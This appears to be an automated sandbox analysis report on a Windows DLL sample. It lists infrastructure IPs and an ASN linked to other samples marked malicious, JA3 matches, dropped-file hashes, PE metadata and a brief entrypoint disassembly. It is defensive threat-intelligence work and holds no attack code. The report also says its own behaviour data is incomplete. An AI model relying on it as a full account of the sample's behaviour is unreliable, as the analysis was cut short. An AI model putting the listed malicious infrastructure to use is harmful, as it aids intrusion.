                                                                                            • Exclude process from analysis (whitelisted): audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, wuapihost.exe
                                                                                            • Excluded IPs from analysis (whitelisted): 23.211.6.115, 23.35.236.56, 20.54.110.249
                                                                                            • Excluded domains from analysis (whitelisted): www.bing.com, client.wns.windows.com, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, store-images.s-microsoft.com-c.edgekey.net, e1723.g.akamaiedge.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, store-images.s-microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                                                                            • Not all processes where analyzed, report is missing behavior information
                                                                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                            • Report size getting too big, too many NtQueryValueKey calls found.

                                                                                            Simulations

                                                                                            Behavior and APIs

                                                                                            TimeTypeDescription
                                                                                            14:19:02API Interceptor1x Sleep call for process: svchost.exe modified
                                                                                            14:20:16API Interceptor1x Sleep call for process: MpCmdRun.exe modified

                                                                                            Joe Sandbox View / Context

                                                                                            IPs

                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                            207.148.81.119tUJXpPwU27.dllGet hashmaliciousBrowse
                                                                                              pYebrdRKvR.dllGet hashmaliciousBrowse
                                                                                                pPX9DaPVYj.dllGet hashmaliciousBrowse
                                                                                                  wUKXjICs5f.dllGet hashmaliciousBrowse
                                                                                                    cRC6TZG6Wx.dllGet hashmaliciousBrowse
                                                                                                      qrb6jVwzoe.dllGet hashmaliciousBrowse
                                                                                                        1711.docGet hashmaliciousBrowse
                                                                                                          GQwxmGZFvtg.dllGet hashmaliciousBrowse
                                                                                                            wNjqkrm8pH.dllGet hashmaliciousBrowse
                                                                                                              5YO8hZg21O.dllGet hashmaliciousBrowse
                                                                                                                dUGnMYeP1C.dllGet hashmaliciousBrowse
                                                                                                                  yFAXc9z51V.dllGet hashmaliciousBrowse
                                                                                                                    9fC0as7YLE.dllGet hashmaliciousBrowse
                                                                                                                      FIyE6huzxV.dllGet hashmaliciousBrowse
                                                                                                                        V0gZWRXv8d.dllGet hashmaliciousBrowse
                                                                                                                          t5EuQW2GUF.dllGet hashmaliciousBrowse
                                                                                                                            uh1WyesPlh.dllGet hashmaliciousBrowse
                                                                                                                              8rryPzJR1p.dllGet hashmaliciousBrowse
                                                                                                                                a65FgjVus4.dllGet hashmaliciousBrowse
                                                                                                                                  196.44.98.190MakbLShaqA.dllGet hashmaliciousBrowse
                                                                                                                                    tUJXpPwU27.dllGet hashmaliciousBrowse
                                                                                                                                      pYebrdRKvR.dllGet hashmaliciousBrowse
                                                                                                                                        pPX9DaPVYj.dllGet hashmaliciousBrowse
                                                                                                                                          wUKXjICs5f.dllGet hashmaliciousBrowse
                                                                                                                                            cRC6TZG6Wx.dllGet hashmaliciousBrowse
                                                                                                                                              qrb6jVwzoe.dllGet hashmaliciousBrowse
                                                                                                                                                1711.docGet hashmaliciousBrowse
                                                                                                                                                  GQwxmGZFvtg.dllGet hashmaliciousBrowse
                                                                                                                                                    wNjqkrm8pH.dllGet hashmaliciousBrowse
                                                                                                                                                      5YO8hZg21O.dllGet hashmaliciousBrowse
                                                                                                                                                        dUGnMYeP1C.dllGet hashmaliciousBrowse
                                                                                                                                                          yFAXc9z51V.dllGet hashmaliciousBrowse
                                                                                                                                                            9fC0as7YLE.dllGet hashmaliciousBrowse
                                                                                                                                                              FIyE6huzxV.dllGet hashmaliciousBrowse
                                                                                                                                                                V0gZWRXv8d.dllGet hashmaliciousBrowse
                                                                                                                                                                  t5EuQW2GUF.dllGet hashmaliciousBrowse
                                                                                                                                                                    uh1WyesPlh.dllGet hashmaliciousBrowse
                                                                                                                                                                      8rryPzJR1p.dllGet hashmaliciousBrowse
                                                                                                                                                                        a65FgjVus4.dllGet hashmaliciousBrowse

                                                                                                                                                                          Domains

                                                                                                                                                                          No context

                                                                                                                                                                          ASN

                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                          AS-CHOOPAUSMakbLShaqA.dllGet hashmaliciousBrowse
                                                                                                                                                                          • 66.42.57.149
                                                                                                                                                                          OPKyR75fJn.exeGet hashmaliciousBrowse
                                                                                                                                                                          • 149.28.253.196
                                                                                                                                                                          Ljm7n1QDZeGet hashmaliciousBrowse
                                                                                                                                                                          • 68.232.173.117
                                                                                                                                                                          Jx35I5pwgdGet hashmaliciousBrowse
                                                                                                                                                                          • 66.42.54.65
                                                                                                                                                                          tUJXpPwU27.dllGet hashmaliciousBrowse
                                                                                                                                                                          • 66.42.57.149
                                                                                                                                                                          LZxr7xI4nc.exeGet hashmaliciousBrowse
                                                                                                                                                                          • 149.28.253.196
                                                                                                                                                                          3E8869030B9C89B8C43E9F8A6730A516E3945AB1272E3.exeGet hashmaliciousBrowse
                                                                                                                                                                          • 149.28.253.196
                                                                                                                                                                          5A15ECE1649A5EF54B70B95D9D413BAD068B8C1C932E2.exeGet hashmaliciousBrowse
                                                                                                                                                                          • 149.28.253.196
                                                                                                                                                                          asbestos_safety_and_eradication_agency_enterprise_agreement 41573 .jsGet hashmaliciousBrowse
                                                                                                                                                                          • 45.76.154.237
                                                                                                                                                                          23062BA932165210EBB3FFCD15474E79F19E6AD74869F.exeGet hashmaliciousBrowse
                                                                                                                                                                          • 149.28.253.196
                                                                                                                                                                          DA8063D9EB60622915D492542A6A8AE318BC87B4C5F89.exeGet hashmaliciousBrowse
                                                                                                                                                                          • 155.138.201.103
                                                                                                                                                                          asbestos_safety_and_eradication_agency_enterprise_agreement 64081 .jsGet hashmaliciousBrowse
                                                                                                                                                                          • 45.76.154.237
                                                                                                                                                                          pYebrdRKvR.dllGet hashmaliciousBrowse
                                                                                                                                                                          • 66.42.57.149
                                                                                                                                                                          pPX9DaPVYj.dllGet hashmaliciousBrowse
                                                                                                                                                                          • 66.42.57.149
                                                                                                                                                                          wUKXjICs5f.dllGet hashmaliciousBrowse
                                                                                                                                                                          • 66.42.57.149
                                                                                                                                                                          cRC6TZG6Wx.dllGet hashmaliciousBrowse
                                                                                                                                                                          • 66.42.57.149
                                                                                                                                                                          qrb6jVwzoe.dllGet hashmaliciousBrowse
                                                                                                                                                                          • 66.42.57.149
                                                                                                                                                                          AWB_NO_9284730932.exeGet hashmaliciousBrowse
                                                                                                                                                                          • 45.32.28.45
                                                                                                                                                                          arm6-20211124-0649Get hashmaliciousBrowse
                                                                                                                                                                          • 44.168.42.223
                                                                                                                                                                          6D2FF3CC83EA214E33E4105CCB1051CD85B82E052F615.exeGet hashmaliciousBrowse
                                                                                                                                                                          • 149.28.253.196
                                                                                                                                                                          EcobandGHMakbLShaqA.dllGet hashmaliciousBrowse
                                                                                                                                                                          • 196.44.98.190
                                                                                                                                                                          tUJXpPwU27.dllGet hashmaliciousBrowse
                                                                                                                                                                          • 196.44.98.190
                                                                                                                                                                          pYebrdRKvR.dllGet hashmaliciousBrowse
                                                                                                                                                                          • 196.44.98.190
                                                                                                                                                                          pPX9DaPVYj.dllGet hashmaliciousBrowse
                                                                                                                                                                          • 196.44.98.190
                                                                                                                                                                          wUKXjICs5f.dllGet hashmaliciousBrowse
                                                                                                                                                                          • 196.44.98.190
                                                                                                                                                                          cRC6TZG6Wx.dllGet hashmaliciousBrowse
                                                                                                                                                                          • 196.44.98.190
                                                                                                                                                                          qrb6jVwzoe.dllGet hashmaliciousBrowse
                                                                                                                                                                          • 196.44.98.190
                                                                                                                                                                          1711.docGet hashmaliciousBrowse
                                                                                                                                                                          • 196.44.98.190
                                                                                                                                                                          n6J7QJs4bk.dllGet hashmaliciousBrowse
                                                                                                                                                                          • 196.44.109.73
                                                                                                                                                                          GQwxmGZFvtg.dllGet hashmaliciousBrowse
                                                                                                                                                                          • 196.44.98.190
                                                                                                                                                                          wNjqkrm8pH.dllGet hashmaliciousBrowse
                                                                                                                                                                          • 196.44.98.190
                                                                                                                                                                          5YO8hZg21O.dllGet hashmaliciousBrowse
                                                                                                                                                                          • 196.44.98.190
                                                                                                                                                                          dUGnMYeP1C.dllGet hashmaliciousBrowse
                                                                                                                                                                          • 196.44.98.190
                                                                                                                                                                          yFAXc9z51V.dllGet hashmaliciousBrowse
                                                                                                                                                                          • 196.44.98.190
                                                                                                                                                                          9fC0as7YLE.dllGet hashmaliciousBrowse
                                                                                                                                                                          • 196.44.98.190
                                                                                                                                                                          FIyE6huzxV.dllGet hashmaliciousBrowse
                                                                                                                                                                          • 196.44.98.190
                                                                                                                                                                          V0gZWRXv8d.dllGet hashmaliciousBrowse
                                                                                                                                                                          • 196.44.98.190
                                                                                                                                                                          t5EuQW2GUF.dllGet hashmaliciousBrowse
                                                                                                                                                                          • 196.44.98.190
                                                                                                                                                                          uh1WyesPlh.dllGet hashmaliciousBrowse
                                                                                                                                                                          • 196.44.98.190
                                                                                                                                                                          8rryPzJR1p.dllGet hashmaliciousBrowse
                                                                                                                                                                          • 196.44.98.190

                                                                                                                                                                          JA3 Fingerprints

                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                          51c64c77e60f3980eea90869b68c58a8MakbLShaqA.dllGet hashmaliciousBrowse
                                                                                                                                                                          • 51.178.61.60
                                                                                                                                                                          lhvzcskYLPyellowfacebrownietacohead.dllGet hashmaliciousBrowse
                                                                                                                                                                          • 51.178.61.60
                                                                                                                                                                          vacehcp3Zv.dllGet hashmaliciousBrowse
                                                                                                                                                                          • 51.178.61.60
                                                                                                                                                                          SecuriteInfo.com.Drixed-FJX5EDC20B587B4.1828.dllGet hashmaliciousBrowse
                                                                                                                                                                          • 51.178.61.60
                                                                                                                                                                          SecuriteInfo.com.Suspicious.Win32.Save.a.20268.dllGet hashmaliciousBrowse
                                                                                                                                                                          • 51.178.61.60
                                                                                                                                                                          PSVSotIVGj.dllGet hashmaliciousBrowse
                                                                                                                                                                          • 51.178.61.60
                                                                                                                                                                          ivXBh7Nwmt.dllGet hashmaliciousBrowse
                                                                                                                                                                          • 51.178.61.60
                                                                                                                                                                          34PZXoE0JJ.dllGet hashmaliciousBrowse
                                                                                                                                                                          • 51.178.61.60
                                                                                                                                                                          jPzSCuyellowfacebrownietacohead.dllGet hashmaliciousBrowse
                                                                                                                                                                          • 51.178.61.60
                                                                                                                                                                          pYebrdRKvR.dllGet hashmaliciousBrowse
                                                                                                                                                                          • 51.178.61.60
                                                                                                                                                                          pPX9DaPVYj.dllGet hashmaliciousBrowse
                                                                                                                                                                          • 51.178.61.60
                                                                                                                                                                          wUKXjICs5f.dllGet hashmaliciousBrowse
                                                                                                                                                                          • 51.178.61.60
                                                                                                                                                                          cRC6TZG6Wx.dllGet hashmaliciousBrowse
                                                                                                                                                                          • 51.178.61.60
                                                                                                                                                                          qrb6jVwzoe.dllGet hashmaliciousBrowse
                                                                                                                                                                          • 51.178.61.60
                                                                                                                                                                          ReadMe[2021.11.22_12-15].vbsGet hashmaliciousBrowse
                                                                                                                                                                          • 51.178.61.60
                                                                                                                                                                          cTplVWrqRR.dllGet hashmaliciousBrowse
                                                                                                                                                                          • 51.178.61.60
                                                                                                                                                                          NErdgsNsKR.vbsGet hashmaliciousBrowse
                                                                                                                                                                          • 51.178.61.60
                                                                                                                                                                          F.A.Q[2021.11.22_12-15].vbsGet hashmaliciousBrowse
                                                                                                                                                                          • 51.178.61.60
                                                                                                                                                                          Q1KL4ickDw.dllGet hashmaliciousBrowse
                                                                                                                                                                          • 51.178.61.60
                                                                                                                                                                          yZGYbaJ.dllGet hashmaliciousBrowse
                                                                                                                                                                          • 51.178.61.60

                                                                                                                                                                          Dropped Files

                                                                                                                                                                          No context

                                                                                                                                                                          Created / dropped Files

                                                                                                                                                                          C:\ProgramData\Microsoft\Network\Downloader\edb.chk
                                                                                                                                                                          Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                          File Type:data
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):8192
                                                                                                                                                                          Entropy (8bit):0.3593198815979092
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:12:SnaaD0JcaaD0JwQQU2naaD0JcaaD0JwQQU:4tgJctgJw/tgJctgJw
                                                                                                                                                                          MD5:BF1DC7D5D8DAD7478F426DF8B3F8BAA6
                                                                                                                                                                          SHA1:C6B0BDE788F553F865D65F773D8F6A3546887E42
                                                                                                                                                                          SHA-256:BE47C764C38CA7A90A345BE183F5261E89B98743B5E35989E9A8BE0DA498C0F2
                                                                                                                                                                          SHA-512:00F2412AA04E09EA19A8315D80BE66D2727C713FC0F5AE6A9334BABA539817F568A98CA3A45B2673282BDD325B8B0E2840A393A4DCFADCB16473F5EAF2AF3180
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview: .............*..........3...w..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@......................................................*.............................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                          C:\ProgramData\Microsoft\Network\Downloader\edb.log
                                                                                                                                                                          Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                          File Type:MPEG-4 LOAS
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):1310720
                                                                                                                                                                          Entropy (8bit):0.24948764736669463
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:1536:BJiRdfVzkZm3lyf49uyc0ga04PdHS9LrM/oVMUdSRU49:BJiRdwfu2SRU49
                                                                                                                                                                          MD5:A7335A8119E679AA9A6631C5B87A4D32
                                                                                                                                                                          SHA1:BA2C848CB15D404619E6287931AD1BA0B54D1BD2
                                                                                                                                                                          SHA-256:5056AF98C8C147D6771B888DA45FDC7C3ACEE99A312EC5786827BD5C0729D772
                                                                                                                                                                          SHA-512:73054710FA2D9DFFA5A12B9D8CF1F22F3DCE727B15EC8A9A1E313E8EA1AD220214FCC9AF35692E74497167AE91C7ED6654E4F5666D55DCD31609486880E9544E
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview: V.d.........@..@.3...w...........................3...w..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@.........................................d#.................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                          C:\ProgramData\Microsoft\Network\Downloader\qmgr.db
                                                                                                                                                                          Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                          File Type:Extensible storage engine DataBase, version 0x620, checksum 0xe45a3984, page size 16384, Windows version 10.0
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):786432
                                                                                                                                                                          Entropy (8bit):0.2505361316236436
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:384:Ijl+W0StseCJ48EApW0StseCJ48E2rTSjlK/ebmLerYSRSY1J2:IjWSB2nSB2RSjlK/+mLesOj1J2
                                                                                                                                                                          MD5:30D550F5D38E9D5FC728495F852D4B17
                                                                                                                                                                          SHA1:F89ABBAC72EF9B23E9D44FB48FC2E4AD1053A91C
                                                                                                                                                                          SHA-256:FCB92B57D44503A1147318F264648D5283B891311A2924F90674F510B062DFD1
                                                                                                                                                                          SHA-512:1E9E538B8049A8564D29307F8EB6793D480725E6AF8B2972356A447A8EAEC18E8BD7FF17E5A0025D21BBB64CE6AF2DB173892E1E06AADB535F96679949BAA670
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview: .Z9.... ................e.f.3...w........................)..........yS......y..h.(..........yS...)..............3...w...........................................................................................................B...........@...................................................................................................... ...................................................................................................................................................................................................................................................Y.D......yS..................|.......yS.........................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                          C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm
                                                                                                                                                                          Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                          File Type:data
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):16384
                                                                                                                                                                          Entropy (8bit):0.07351806505695455
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:3:2oillJ7vmll8T2l/l2le7c2lu4wbl/Yll3Vkttlmlnl:2oillJrmlV77/3
                                                                                                                                                                          MD5:208B90768D7CFDA228718915B355CBE8
                                                                                                                                                                          SHA1:C7388A403555B6B3F1456AE6F35891D93B1C72AF
                                                                                                                                                                          SHA-256:450D5920506D2DF487D18BA264E3F7D7C944C497EB2F7EAFB64C8A13A1256AB7
                                                                                                                                                                          SHA-512:41DF0773789ECB35EAF43F54B119646A996A8C85803A09057E68612F311F6F261554A4049E173C65A4599B0D6B346D33B113958C4B4C96393CAEB4627F3CE2A2
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview: ........................................3...w.......yU......yS..............yS......yS..t.!.....y...................|.......yS.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                          C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
                                                                                                                                                                          Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):55
                                                                                                                                                                          Entropy (8bit):4.306461250274409
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                                                                                                          MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                                                                                                          SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                                                                                                          SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                                                                                                          SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                                                                                                                                                          C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\MpCmdRun.log
                                                                                                                                                                          Process:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                                                                                          File Type:Little-endian UTF-16 Unicode text, with CRLF, CR line terminators
                                                                                                                                                                          Category:modified
                                                                                                                                                                          Size (bytes):7250
                                                                                                                                                                          Entropy (8bit):3.1696232359581487
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:96:cEj+AbCEH+AbuEAc+AbhGEA+AbNEe+Ab/Ee+AbPE6w9+Ab1wTEz+AbG:cY+38+DJc+iGr+MZ+65+6tg+ECI+z
                                                                                                                                                                          MD5:58FB451EEC996B2E1E31B3702038230A
                                                                                                                                                                          SHA1:8E0F459C82DB9EC32986BA327744FC17CC1C83A6
                                                                                                                                                                          SHA-256:5BF64CC8E9E7F06F05A3FCB128FA3729E46F0C0B80E7E7E8A9FAF8EAEB75F7B6
                                                                                                                                                                          SHA-512:BFCC3E3DDDDD1644542AE8085E76431D90F4255A15B5A804C578E98F782B2BEA62C539141BA052D3CB37E63D514DBF8EB369DE3291833163A254CA4F5CFA39B7
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview: ..........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....M.p.C.m.d.R.u.n.:. .C.o.m.m.a.n.d. .L.i.n.e.:. .".C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.m.p.c.m.d.r.u.n...e.x.e.". .-.w.d.e.n.a.b.l.e..... .S.t.a.r.t. .T.i.m.e.:. .. T.h.u. .. J.u.n. .. 2.7. .. 2.0.1.9. .0.1.:.2.9.:.4.9.........M.p.E.n.s.u.r.e.P.r.o.c.e.s.s.M.i.t.i.g.a.t.i.o.n.P.o.l.i.c.y.:. .h.r. .=. .0.x.1.....W.D.E.n.a.b.l.e.....E.R.R.O.R.:. .M.p.W.D.E.n.a.b.l.e.(.T.R.U.E.). .f.a.i.l.e.d. .(.8.0.0.7.0.4.E.C.).....M.p.C.m.d.R.u.n.:. .E.n.d. .T.i.m.e.:. .. T.h.u. .. J.u.n. .. 2.7. .. 2.0.1.9. .0.1.:.2.9.:.4.9.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.............-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.
                                                                                                                                                                          C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\DeliveryOptimization\Logs\dosvc.20211125_221913_781.etl
                                                                                                                                                                          Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                          File Type:data
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):12288
                                                                                                                                                                          Entropy (8bit):3.809576886448466
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:96:GCXTzwo+mP5oT93D/YvUC5hI2lmcka94THT2GjFzCNMCJdJRgj5GPNMCjY56UMC4:lQz3L4823/OCN6CfCjCMCxCi
                                                                                                                                                                          MD5:D066D4108567BF3E33D816E4714D31CD
                                                                                                                                                                          SHA1:8A1A5D3F4B2C99DB65D51705C1FFFE7B39F3AB9D
                                                                                                                                                                          SHA-256:3B2F9D8C37E6DB1C1C352A04F2C1A44ABF96C37CA219291AABB394392A5EB313
                                                                                                                                                                          SHA-512:19D65811918406733F156B27477BF30F9DE74EA24E3E7FF3D5E3AC7EB049F6B786B52697138B889A9C0080EC0314C67B5726C11AFDDEF9D854B26E728DF873C5
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview: .... ... ....................................... ...!...........................l.......R).......................B..............Zb... ... ..........................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1............................................................./_8..... .......MzJ...........8.6.9.6.E.A.C.4.-.1.2.8.8.-.4.2.8.8.-.A.4.E.E.-.4.9.E.E.4.3.1.B.0.A.D.9...C.:.\.W.i.n.d.o.w.s.\.S.e.r.v.i.c.e.P.r.o.f.i.l.e.s.\.N.e.t.w.o.r.k.S.e.r.v.i.c.e.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s.\.D.e.l.i.v.e.r.y.O.p.t.i.m.i.z.a.t.i.o.n.\.L.o.g.s.\.d.o.s.v.c...2.0.2.1.1.1.2.5._.2.2.1.9.1.3._.7.8.1...e.t.l.........P.P.l.......R)......................................................................................................................................................................................................................................................................

                                                                                                                                                                          Static File Info

                                                                                                                                                                          General

                                                                                                                                                                          File type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                          Entropy (8bit):6.907606201813591
                                                                                                                                                                          TrID:
                                                                                                                                                                          • Win32 Dynamic Link Library (generic) (1002004/3) 94.34%
                                                                                                                                                                          • InstallShield setup (43055/19) 4.05%
                                                                                                                                                                          • Windows Screen Saver (13104/52) 1.23%
                                                                                                                                                                          • Generic Win/DOS Executable (2004/3) 0.19%
                                                                                                                                                                          • DOS Executable Generic (2002/1) 0.19%
                                                                                                                                                                          File name:MakbLShaqA.dll
                                                                                                                                                                          File size:668672
                                                                                                                                                                          MD5:d8f093871cd90d160aa42b945f68e229
                                                                                                                                                                          SHA1:bed9b13fc1caeab0d9ee69c7ee9a3fc7939c04d5
                                                                                                                                                                          SHA256:778db11e074622c21181ac26eaead6bb1c8e60d4aee8b7df810ffffbd03b2064
                                                                                                                                                                          SHA512:a9bf951c3d0f699e038ab092eb43db2156815ff9cc9845ff24921db1f5e32fef59f020719733d55d95819cdcfbadaf84cb4fdfca47981e31b0bf692433eb005f
                                                                                                                                                                          SSDEEP:12288:ZLqntrsKNni3jR34UrmTMQFQIBV+5UZF/imMG:Z2trTZwF34LTkZkom5
                                                                                                                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Je.....T...T...T)..T...T)..T...T...T%..T.VST...T.VET...T.VBT...T.VLT...T.VTT...T.VRT...T.VWT...TRich...T.......................

                                                                                                                                                                          File Icon

                                                                                                                                                                          Icon Hash:74f0e4ecccdce0e4

                                                                                                                                                                          Static PE Info

                                                                                                                                                                          General

                                                                                                                                                                          Entrypoint:0x1003ff7f
                                                                                                                                                                          Entrypoint Section:.text
                                                                                                                                                                          Digitally signed:false
                                                                                                                                                                          Imagebase:0x10000000
                                                                                                                                                                          Subsystem:windows gui
                                                                                                                                                                          Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                                                                                                                                                                          DLL Characteristics:
                                                                                                                                                                          Time Stamp:0x619E9E08 [Wed Nov 24 20:18:16 2021 UTC]
                                                                                                                                                                          TLS Callbacks:
                                                                                                                                                                          CLR (.Net) Version:
                                                                                                                                                                          OS Version Major:5
                                                                                                                                                                          OS Version Minor:0
                                                                                                                                                                          File Version Major:5
                                                                                                                                                                          File Version Minor:0
                                                                                                                                                                          Subsystem Version Major:5
                                                                                                                                                                          Subsystem Version Minor:0
                                                                                                                                                                          Import Hash:cb788e621f390567a1ec94b8d2369e89

                                                                                                                                                                          Entrypoint Preview

                                                                                                                                                                          Instruction
                                                                                                                                                                          mov edi, edi
                                                                                                                                                                          push ebp
                                                                                                                                                                          mov ebp, esp
                                                                                                                                                                          cmp dword ptr [ebp+0Ch], 01h
                                                                                                                                                                          jne 00007F1E14C48107h
                                                                                                                                                                          call 00007F1E14C50ED7h
                                                                                                                                                                          push dword ptr [ebp+08h]
                                                                                                                                                                          mov ecx, dword ptr [ebp+10h]
                                                                                                                                                                          mov edx, dword ptr [ebp+0Ch]
                                                                                                                                                                          call 00007F1E14C47FF1h
                                                                                                                                                                          pop ecx
                                                                                                                                                                          pop ebp
                                                                                                                                                                          retn 000Ch
                                                                                                                                                                          mov edi, edi
                                                                                                                                                                          push ebp
                                                                                                                                                                          mov ebp, esp
                                                                                                                                                                          push esi
                                                                                                                                                                          push edi
                                                                                                                                                                          mov edi, dword ptr [ebp+10h]
                                                                                                                                                                          mov eax, edi
                                                                                                                                                                          sub eax, 00000000h
                                                                                                                                                                          je 00007F1E14C496EBh
                                                                                                                                                                          dec eax
                                                                                                                                                                          je 00007F1E14C496D3h
                                                                                                                                                                          dec eax
                                                                                                                                                                          je 00007F1E14C4969Eh
                                                                                                                                                                          dec eax
                                                                                                                                                                          je 00007F1E14C4964Fh
                                                                                                                                                                          dec eax
                                                                                                                                                                          je 00007F1E14C495BFh
                                                                                                                                                                          mov ecx, dword ptr [ebp+0Ch]
                                                                                                                                                                          mov eax, dword ptr [ebp+08h]
                                                                                                                                                                          push ebx
                                                                                                                                                                          push 00000020h
                                                                                                                                                                          pop edx
                                                                                                                                                                          jmp 00007F1E14C48577h
                                                                                                                                                                          mov esi, dword ptr [eax]
                                                                                                                                                                          cmp esi, dword ptr [ecx]
                                                                                                                                                                          je 00007F1E14C4817Eh
                                                                                                                                                                          movzx esi, byte ptr [eax]
                                                                                                                                                                          movzx ebx, byte ptr [ecx]
                                                                                                                                                                          sub esi, ebx
                                                                                                                                                                          je 00007F1E14C48117h
                                                                                                                                                                          xor ebx, ebx
                                                                                                                                                                          test esi, esi
                                                                                                                                                                          setnle bl
                                                                                                                                                                          lea ebx, dword ptr [ebx+ebx-01h]
                                                                                                                                                                          mov esi, ebx
                                                                                                                                                                          test esi, esi
                                                                                                                                                                          jne 00007F1E14C4856Fh
                                                                                                                                                                          movzx esi, byte ptr [eax+01h]
                                                                                                                                                                          movzx ebx, byte ptr [ecx+01h]
                                                                                                                                                                          sub esi, ebx
                                                                                                                                                                          je 00007F1E14C48117h
                                                                                                                                                                          xor ebx, ebx
                                                                                                                                                                          test esi, esi
                                                                                                                                                                          setnle bl
                                                                                                                                                                          lea ebx, dword ptr [ebx+ebx-01h]
                                                                                                                                                                          mov esi, ebx
                                                                                                                                                                          test esi, esi
                                                                                                                                                                          jne 00007F1E14C4854Eh
                                                                                                                                                                          movzx esi, byte ptr [eax+02h]
                                                                                                                                                                          movzx ebx, byte ptr [ecx+02h]
                                                                                                                                                                          sub esi, ebx
                                                                                                                                                                          je 00007F1E14C48117h
                                                                                                                                                                          xor ebx, ebx
                                                                                                                                                                          test esi, esi
                                                                                                                                                                          setnle bl
                                                                                                                                                                          lea ebx, dword ptr [ebx+ebx-01h]
                                                                                                                                                                          mov esi, ebx
                                                                                                                                                                          test esi, esi
                                                                                                                                                                          jne 00007F1E14C4852Dh
